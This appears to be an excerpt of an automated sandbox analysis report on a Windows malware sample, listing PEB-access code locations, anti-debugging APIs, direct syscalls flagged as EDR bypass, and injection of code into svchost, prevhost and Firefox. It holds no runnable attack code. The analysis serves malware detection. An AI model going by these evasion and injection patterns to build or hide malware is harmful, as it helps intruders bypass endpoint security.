Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]	2_2_02F6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]	2_2_02F5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]	2_2_02FBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]	2_2_02F5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_02FDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]	2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]	2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]	2_2_03004A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]	2_2_02F2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]	2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]	2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]	2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]	2_2_02FD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]	2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]	2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]	2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]	2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_02FFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_02F5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]	2_2_02FBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]	2_2_02F30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]	2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]	2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]	2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]	2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]	2_2_02F60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]	2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]	2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]	2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]	2_2_02F6A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]	2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]	2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]	2_2_02FBC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]	2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]	2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_02FBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]	2_2_02F649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_02FFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]	2_2_02FC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]	2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]	2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]	2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]	2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]	2_2_02FBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]	2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7096E mov edx, dword ptr fs:[00000030h]	2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]	2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0946 mov eax, dword ptr fs:[00000030h]	2_2_02FB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB892A mov eax, dword ptr fs:[00000030h]	2_2_02FB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC892B mov eax, dword ptr fs:[00000030h]	2_2_02FC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC912 mov eax, dword ptr fs:[00000030h]	2_2_02FBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]	2_2_02F28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]	2_2_02F28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]	2_2_02FAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]	2_2_02FAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68EF5 mov eax, dword ptr fs:[00000030h]	2_2_02F68EF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]	2_2_02FCAEB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]	2_2_02FCAEB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]	2_2_02F2AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]	2_2_02F2AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]	2_2_02F2AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004F68 mov eax, dword ptr fs:[00000030h]	2_2_03004F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F62E9C mov eax, dword ptr fs:[00000030h]	2_2_02F62E9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F62E9C mov ecx, dword ptr fs:[00000030h]	2_2_02F62E9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36E71 mov eax, dword ptr fs:[00000030h]	2_2_02F36E71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]	2_2_02FB0E7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]	2_2_02FB0E7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]	2_2_02FB0E7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2EE5A mov eax, dword ptr fs:[00000030h]	2_2_02F2EE5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6E20 mov eax, dword ptr fs:[00000030h]	2_2_02FC6E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6E20 mov eax, dword ptr fs:[00000030h]	2_2_02FC6E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6E20 mov ecx, dword ptr fs:[00000030h]	2_2_02FC6E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004FE7 mov eax, dword ptr fs:[00000030h]	2_2_03004FE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28E1D mov eax, dword ptr fs:[00000030h]	2_2_02F28E1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5AE00 mov eax, dword ptr fs:[00000030h]	2_2_02F5AE00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5AE00 mov eax, dword ptr fs:[00000030h]	2_2_02F5AE00

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_00570B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00570B62

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00542622
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0053083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0053083F
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005309D5 SetUnhandledExceptionFilter,	0_2_005309D5
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00530C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00530C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\prevhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: NULL target: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: NULL target: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\prevhost.exe

Thread register set: target process: 6520

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\prevhost.exe

Thread APC queued: target process: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 230C008

Jump to behavior

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

0_2_00571201

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_00552BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00552BA5

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0057B226 SendInput,keybd_event,

0_2_0057B226

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_005922DA

